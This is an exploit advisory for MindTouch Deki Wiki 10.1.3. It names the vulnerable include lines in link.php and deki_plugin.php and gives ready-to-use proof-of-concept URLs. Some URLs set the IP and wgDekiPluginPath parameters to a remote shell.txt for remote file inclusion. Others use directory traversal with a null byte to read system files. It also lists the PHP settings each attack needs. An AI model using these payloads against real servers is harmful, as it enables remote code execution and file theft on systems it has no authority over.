####################################################
### Exploit Title: MindTouch Deki Wiki v10.1.3 Multiple Vulnerabilities
### Date: 11/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link: http://garr.dl.sourceforge.net/project/dekiwiki/MindTouch%20Core%20Source/Pipestone%2010.1.3/MindTouch_Core_10.1.3_Source.tar.gz
### Tested on: Linux/Windows
### Version : 10.1.3 ( I don't check old version & may be affected ! )
####################################################

# Multiple Remote File Inclusion :

1- File ( deki/gui/link.php ) in lines 27 & 28 :

require_once($IP . '/includes/Defines.php');

require_once($IP . '/includes/Setup.php');

- P.O.C :

http://127.0.0.1/deki/web/deki/gui/link.php?IP=http://127.0.0.1/shell.txt?

2- File ( deki/plugins/deki_plugin.php ) in lines 486 , 487 & 488 :

require_once($IP . $wgDekiPluginPath . '/' . 'deki_plugin_view.php');
require_once($IP . $wgDekiPluginPath . '/' . 'special_page_plugin.php');
require_once($IP . $wgDekiPluginPath . '/' . 'special_mvc_plugin.php');

- P.O.C :

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=http://127.0.0.1/shell.txt?

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://127.0.0.1/shell.txt?

-----------------------------------------------------------------------------

# Multiple Local File Inclusion :

- P.O.C :

http://127.0.0.1/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00

# Notes :

- For Remote File Inclusion Must Be allow_url_include=On

- For Local File Inclusion Must Be magic_quotes_gpc = Off

# Greetz to my friendz